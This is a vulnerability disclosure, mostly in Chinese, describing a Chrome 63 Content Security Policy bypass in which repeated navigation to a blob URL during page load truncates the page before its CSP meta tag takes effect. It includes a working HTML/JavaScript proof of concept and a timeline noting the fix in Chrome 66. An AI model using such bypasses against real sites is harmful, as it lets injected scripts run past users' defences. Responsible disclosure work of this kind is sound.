Chrome 63.0 CSP Bypass/Page Truncation by navigating to Blob during load

0x01 TL;DR

我观察到当 try catch 在计时器中使用 location 设置 blob scheme 时,网络请求加载会被随机阻断(页面完成加载但内容部分缺失,有趣的是内容缺失是从上到下的顺序),这个缺陷让我想到能够利用并优先吃掉 head 头中出现的 CSP 防御策略,这样声明的策略就会彻底失效,注入内容能够顺利执行。

比如这样:

<cut>

content...

<meta http-equiv="Content-Security-Policy" content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:">

</cut>

content...

here injection

截断 Google or Bing:

https://i.loli.net/2017/11/09/5a040d0918a19.jpg

https://i.loli.net/2017/11/09/5a040d38ba95e.jpg

0x02 PoC

<html>
    <!-- author: evi1m0.bat[at]gmail.com -->
    <script>
        pwn = () => {
            target = 'http://server.n0tr00t.com/chrome/csptest.php?p=' + Date();
            win = window.open(target, "emm", "width=500,height=400");

            setInterval(`try{
                    x = win.location.href;
                } catch(e) {
                    win.location.href = 'blob://';
                }`, 1);
        }
    </script>

    <p>
      <a onclick="pwn()" target="_blank">Click me bypass CSP</a>
      // If it doesn't work, again. :)
    </p>
</html>

0x03 Video

0x04 Track

  • Nov 9 2017: Reported by evi1m0.bat@gmail.com
  • May 7 2018: Chrome fixed 66.0.3359.139
  • https://bugs.chromium.org/p/chromium/issues/detail?id=783073#c_ts1525680141